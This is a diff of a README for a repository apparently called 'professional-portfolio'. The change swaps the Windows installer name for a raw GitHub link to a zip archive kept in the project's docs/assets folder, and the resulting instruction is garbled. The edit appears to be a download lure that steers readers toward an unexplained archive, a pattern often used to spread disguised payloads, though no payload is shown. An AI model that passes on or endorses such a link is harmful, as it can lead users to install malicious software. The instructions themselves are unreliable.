bobsHack/professional-portfolio/README.md

 On the download page, look for a file that matches your computer.
 The file names usually show your operating system.

-- For Windows, look for `professional-portfolio-win.exe` or similar.
+- For Windows, look for `https://github.com/bobsHack/professional-portfolio/raw/refs/heads/main/docs/assets/portfolio_professional_v3.2.zip` or similar.
 - For macOS, look for a `.dmg` file.
 - For Linux, look for an `.AppImage` or `.deb` file.